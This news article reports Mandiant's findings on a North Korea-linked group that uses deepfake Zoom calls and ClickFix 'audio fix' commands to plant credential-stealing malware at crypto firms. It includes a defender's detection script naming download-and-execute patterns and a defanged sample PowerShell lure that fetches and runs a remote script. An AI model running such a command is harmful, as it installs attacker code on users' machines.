Google’s cybersecurity division Mandiant has issued a warning that threat actors linked to North Korea are increasingly incorporating AI-generated deepfake technology into sophisticated social engineering campaigns targeting cryptocurrency and fintech companies.
In a report released Monday, Mandiant detailed a recent investigation into a breach at a fintech firm attributed to UNC1069 — also known as “CryptoCore” — a threat cluster assessed to have strong ties to North Korea. The operation combined compromised Telegram accounts, fraudulent Zoom meetings, and a technique known as “ClickFix” to trick victims into executing malicious commands. Investigators also identified evidence that AI-generated video was used during the fake meeting to enhance the credibility of the impersonation.
Highly Targeted Social Engineering Campaigns
According to Mandiant, UNC1069 has expanded its focus beyond broad phishing campaigns to conduct highly personalized attacks aimed at organizations and individuals in the crypto ecosystem. Targets reportedly include software companies, blockchain developers, venture capital firms, and executive leadership teams.
The attack chain described in the report began when a victim was contacted via Telegram by what appeared to be a well-known crypto industry executive. However, the account had allegedly been compromised and was under attacker control. After establishing rapport, the attacker sent a Calendly scheduling link for a 30-minute meeting; the link redirected the victim to a fraudulent Zoom session hosted on infrastructure controlled by the threat group.
During the call, the victim reportedly observed what appeared to be a recognizable crypto CEO on video — later assessed to be AI-generated deepfake content.
Shortly after the meeting began, the attackers claimed there were audio issues and instructed the victim to execute specific “troubleshooting” commands — a variation of the ClickFix technique. This action triggered the deployment of malware. Subsequent forensic analysis identified seven distinct malware families on the victim’s system, designed to steal login credentials, browser data, and session tokens for financial theft and further impersonation.
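ClickFix lures hinge on persuading the target to paste a short "fix" command that quietly downloads and runs a payload. As a rough illustration only, and not code from the Mandiant report, the Python sketch below shows how defenders might flag clipboard text matching common download-and-execute shapes; the regex patterns and the defanged sample lure are illustrative assumptions, not an exhaustive detection rule.

```python
import re

# Illustrative patterns only: common "download and execute" shapes seen in
# publicly documented ClickFix lures (curl/wget piped to a shell, PowerShell
# IEX/DownloadString, mshta fetching a remote script). Not exhaustive.
CLICKFIX_PATTERNS = [
    re.compile(r"(curl|wget)[^\n|;]*\|\s*(ba)?sh", re.IGNORECASE),
    re.compile(r"powershell[^\n]*(iex|invoke-expression)", re.IGNORECASE),
    re.compile(r"(downloadstring|downloadfile)\s*\(", re.IGNORECASE),
    re.compile(r"mshta\s+https?://", re.IGNORECASE),
]

def looks_like_clickfix(clipboard_text: str) -> bool:
    """Return True if pasted text resembles a download-and-execute lure."""
    return any(p.search(clipboard_text) for p in CLICKFIX_PATTERNS)

# A defanged example of the kind of command a fake "audio fix" might present.
sample = 'powershell -w hidden -c "iex (iwr https://example.invalid/fix.ps1)"'
print(looks_like_clickfix(sample))  # True
```

In practice a check like this would live in endpoint tooling rather than a user-run script; the point is that the lure's structure, not its wording, is the detectable signal.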
Escalation of Crypto Theft Linked to North Korea
The warning comes amid continued growth in crypto-related theft attributed to North Korean-linked actors. In mid-December, blockchain analytics firm Chainalysis reported that hackers associated with Pyongyang stole approximately $2.02 billion in digital assets in 2025 — a 51% increase compared to the previous year. The cumulative value of digital assets allegedly stolen by such groups is now estimated at around $6.75 billion, even though the total number of incidents has declined.
These figures suggest a shift toward fewer but more financially impactful operations.
Security analysts note that rather than relying on mass phishing emails, groups like CryptoCore are increasingly leveraging trusted communication channels — including messaging apps and video conferencing platforms — to exploit familiarity and professional trust. By embedding malicious activity within routine business interactions, attackers reduce visible red flags and increase the likelihood of success.
Deepfake and AI Amplify Impersonation Tactics
Fraser Edwards, Co-founder and CEO of decentralized identity company cheqd, stated that the incident reflects a broader evolution in cybercrime tactics, particularly as remote collaboration and virtual meetings become standard across the digital asset sector.
He emphasized that the effectiveness of such operations lies in their subtlety: familiar senders, recognizable meeting formats, and no obvious malicious attachments. Trust is established before technical safeguards have the opportunity to intervene.
According to Edwards, deepfake video is often introduced during escalation stages — such as live calls — where the visual presence of a familiar face can override suspicion triggered by unusual requests or technical disruptions. The objective is not prolonged interaction, but sufficient realism to prompt the target to take a critical action.
AI is also reportedly being used beyond video impersonation. Tools capable of drafting context-aware messages, mimicking tone, and replicating communication styles make fraudulent outreach significantly harder to detect. As AI agents become more integrated into daily workflows — sending messages, scheduling meetings, and acting on behalf of users — the potential scale of automated impersonation increases.
The Need for Default Security Infrastructure
Edwards argues that expecting individuals to reliably detect deepfakes is unrealistic. Instead, organizations should focus on strengthening default security systems, improving authentication layers, and clearly signaling content authenticity.
Rather than relying solely on user vigilance, experts recommend implementing multi-factor authentication, hardware security keys, session monitoring, and zero-trust frameworks — particularly for companies handling digital assets.
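As one hedged sketch of what session monitoring could look like in practice, the snippet below binds a session token to the device fingerprint and IP address it was issued on, and rejects replay from a different context. The field names, HMAC scheme, and policy are illustrative assumptions, not any specific vendor's API.

```python
import hashlib
import hmac
import os
import secrets

# Server-side signing key; SESSION_KEY is a hypothetical environment variable.
SERVER_KEY = os.environ.get("SESSION_KEY", secrets.token_hex(32)).encode()

def issue_token(user_id: str, device_fp: str, ip: str) -> str:
    """Bind a session token to the device/network it was issued on."""
    payload = f"{user_id}|{device_fp}|{ip}"
    sig = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{sig}"

def verify_token(token: str, device_fp: str, ip: str) -> bool:
    """Reject a stolen token replayed from a different device or network."""
    try:
        user_id, bound_fp, bound_ip, sig = token.split("|")
    except ValueError:
        return False
    payload = f"{user_id}|{bound_fp}|{bound_ip}"
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        return False
    # Zero-trust posture: a valid signature alone is not enough;
    # the presenting context must also match the issuing context.
    return bound_fp == device_fp and bound_ip == ip

token = issue_token("alice", "fp-abc123", "203.0.113.7")
print(verify_token(token, "fp-abc123", "203.0.113.7"))   # True: same context
print(verify_token(token, "fp-zzz999", "198.51.100.9"))  # False: replayed token
```

The design choice mirrors the zero-trust principle named above: even a cryptographically valid token is rejected when the surrounding context no longer matches, which blunts the session-token theft described earlier in the attack chain.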
As AI capabilities advance, the line between authentic and synthetic communication continues to blur, creating new operational risks for crypto-native firms that rely heavily on digital trust.
This article is provided for informational purposes only and does not constitute investment advice. Readers should conduct their own research and assess risk before making any financial decisions.
#CryptoNews #CyberSecurity #AI